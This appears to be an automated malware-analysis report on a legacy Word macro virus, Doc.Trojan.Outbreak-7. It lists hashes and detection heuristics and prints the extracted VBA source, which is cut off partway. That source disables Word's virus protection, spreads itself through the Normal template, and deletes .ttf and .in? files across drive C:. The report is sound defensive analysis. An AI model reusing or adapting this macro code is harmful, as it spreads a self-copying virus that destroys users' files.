Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 31fac7bbea8ae66d…

MALICIOUS

Office (OLE)

Size: 47.0 KB
Created: 1995-03-05 04:47:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 25face37bdab1a64de28189ad77f43c4
SHA-1: 4ab37f4f111cb3fcfc56f1b8cd60b05683ed9625
SHA-256: 31fac7bbea8ae66d720583df2c1fd6937c30da0694ab602dd1aa1552974ed22a
Risk Score: 260

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample exhibits characteristics of legacy WordBasic macro viruses and contains VBA macros, including AutoOpen and AutoClose procedures, which are commonly used to execute code as soon as the document is opened or closed. The presence of 'OutBreak!' in the document body and the ClamAV detections further support its malicious nature. The VBA script reads and writes a file named 'c:\command.log', suggesting a potential command-and-control or staging mechanism.

Heuristics (5)

  • ClamAV: Doc.Trojan.Outbreak-7 (critical; CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Outbreak-7
  • Legacy WordBasic macro-virus markers (high; OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    OLE Word document contains legacy WordBasic auto-execution macro markers, such as AutoOpen together with ToolsMacro/MacroFile/fileMacro/globMacro, or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected (medium; 2 related findings; OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro (high; OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Auto_Close macro (high; OLE_VBA_AUTOCLOSE)
    Auto_Close macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6754 bytes
SHA-256: 896f27c4647bc6c9df56a49b977647016291e2b1aa3d06c5f9b3f9b9935f2446
Detection: ClamAV: Doc.Trojan.Outbreak-7
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "OutBreak"
Sub AutoClose()
Attribute AutoClose.VB_Description = "巨集建立於 98/??/??，建立者 OutBreak"
Attribute AutoClose.VB_ProcData.VB_Invoke_Func = "Normal.OutBreak.AutoClose"

Dim EPOLA
On Error Resume Next


Options.VirusProtection = _
False
Set activedoc = _
ActiveDocument
Set GlobalDoc = _
NormalTemplate
   

 Application.OrganizerCopy Source:=NormalTemplate.FullName, _
 Destination:=ActiveDocument.FullName, Name:="OutBreak", _
 Object:=wdOrganizerObjectProjectItems
 activedoc.SaveAs , fileformat:=wdFormatTemplate
 Options.SavePropertiesPrompt = False
   
   
 Application.OrganizerCopy Source:=ActiveDocument.FullName, _
 Destination:=NormalTemplate.FullName, Name:="OutBreak", _
 Object:=wdOrganizerObjectProjectItems
 Options.SaveNormalPrompt = False


EPOLA = _
Int(Rnd() * 20) + 1
If EPOLA > 18 Then
WordBasic.Call "VIRUS"
WordBasic.Call "VIRUS2"
End If
exit_:

End Sub
Sub AutoExec()
Dim Wri$
On Error Resume Next

Open "c:\command.log" For Input As 1
Input #1, Wri$
Close 1

If Wri$ = "MoTaBa-J" Then
WordBasic.Call "VIRUS1"
WordBasic.Call "VIRUS3"
End If

If Wri$ = "" Then
Open "c:\command.log" For Output As 1
Print #1, "MoTaBa-A"
Close 1
GoTo exit_
End If

If Wri$ = "MoTaBa-A" Then
Open "c:\command.log" For Output As 1
Print #1, "MoTaBa-B"
Close 1
GoTo exit_
End If

If Wri$ = "MoTaBa-B" Then
Open "c:\command.log" For Output As 1
Print #1, "MoTaBa-C"
Close 1
GoTo exit_
End If

If Wri$ = "MoTaBa-C" Then
Open "c:\command.log" For Output As 1
Print #1, "MoTaBa-D"
Close 1
GoTo exit_
End If

If Wri$ = "MoTaBa-D" Then
Open "c:\command.log" For Output As 1
Print #1, "MoTaBa-E"
Close 1
GoTo exit_
End If

If Wri$ = "MoTaBa-E" Then
Open "c:\command.log" For Output As 1
Print #1, "MoTaBa-F"
Close 1
GoTo exit_
End If

If Wri$ = "MoTaBa-F" Then
Open "c:\command.log" For Output As 1
Print #1, "MoTaBa-G"
Close 1
GoTo exit_
End If

If Wri$ = "MoTaBa-G" Then
Open "c:\command.log" For Output As 1
Print #1, "MoTaBa-H"
Close 1
GoTo exit_
End If

If Wri$ = "MoTaBa-H" Then
Open "c:\command.log" For Output As 1
Print #1, "MoTaBa-I"
Close 1
GoTo exit_
End If

If Wri$ = "MoTaBa-I" Then
Open "c:\command.log" For Output As 1
Print #1, "MoTaBa-J"
Close 1
GoTo exit_
End If

exit_:

End Sub
Sub AutoOpen()
   
WordBasic.Call "VIRUS4"
WordBasic.Call "VIRUS5"
   
Options.VirusProtection = _
False
Set activedoc = _
ActiveDocument
Set GlobalDoc = _
NormalTemplate
     
 Application.OrganizerCopy Source:=ActiveDocument.FullName, _
 Destination:=NormalTemplate.FullName, Name:="OutBreak", _
 Object:=wdOrganizerObjectProjectItems
 Options.SaveNormalPrompt = False

exit_:
End Sub
Sub FileTemplates()
AutoExec
Rem OutBreak
End Sub
Sub ViewVBCode()
AutoExec
Rem OutBreak
End Sub
Sub ToolsCustomize()
Rem OutBreak
End Sub
Sub ToolsOptions()
Rem OutBreak
End Sub
Sub ToolsMacro()
AutoExec
Rem OutBreak
End Sub
Sub VIRUS()
On Error Resume Next

 With Application.FileSearch
        .Filename = "*.in?"
        .LookIn = "C:\"
        .SearchSubFolders = True
        .Execute
        If .FoundFiles.count <> 0 Then
            For I = 1 To .FoundFiles.count
            Kill .FoundFiles(I)
            'Beep
            Next I
        End If
    End With

End Sub
Sub VIRUS1()
On Error Resume Next

 With Application.FileSearch
        .Filename = "*.ttf"
        .LookIn = "C:\"
        .SearchSubFolders = True
        .Execute
        If .FoundFiles.count <> 0 Then
            For I = 1 To .FoundFiles.count
            Kill .FoundFiles(I)
            'Beep
            Next I
        End If
    End With
    
End Sub
Sub VIRUS2()
On Error Resume Next

 With Application.FileSearch
        .Filen
... (truncated)